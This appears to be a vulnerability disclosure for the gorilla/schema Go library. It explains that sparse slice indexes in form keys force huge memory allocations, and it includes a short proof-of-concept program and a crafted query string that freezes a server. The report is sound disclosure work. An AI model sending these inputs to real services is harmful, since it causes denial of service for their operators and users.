Running schema.Decoder.Decode()
on a struct that has a field of type []struct{...}
opens it up to malicious attacks regarding memory allocations, taking advantage of the sparse slice functionality. For instance, in the Proof of Concept written below, someone can specify to set a field of the billionth element and it will allocate all other elements before it in the slice.
In the local environment environment for my project, I was able to call an endpoint like /innocent_endpoint?arr.10000000.X=1
and freeze my system from the memory allocation while parsing r.Form
. I think this line is responsible for allocating the slice, although I haven't tested to make sure, so it's just an educated guess.
The following proof of concept works on both v1.2.0 and v1.2.1. I have not tested earlier versions.
package main
import (
"fmt"
"github.com/gorilla/schema"
)
func main() {
dec := schema.NewDecoder()
var result struct {
Arr []struct{ Val int }
}
if err := dec.Decode(&result, map[string][]string{"arr.1000000000.Val": {"1"}}); err != nil {
panic(err)
}
fmt.Printf("%#+v\n", result)
}
Any use of schema.Decoder.Decode()
on a struct with arrays of other structs could be vulnerable to this memory exhaustion vulnerability. There seems to be no possible solution that a developer using this library can do to disable this behaviour without fixing it in this project, so all uses of Decode that fall under this umbrella are affected. A fix that doesn't require a major change may also be harder to find, since it could break compatibility with some other intended use-cases.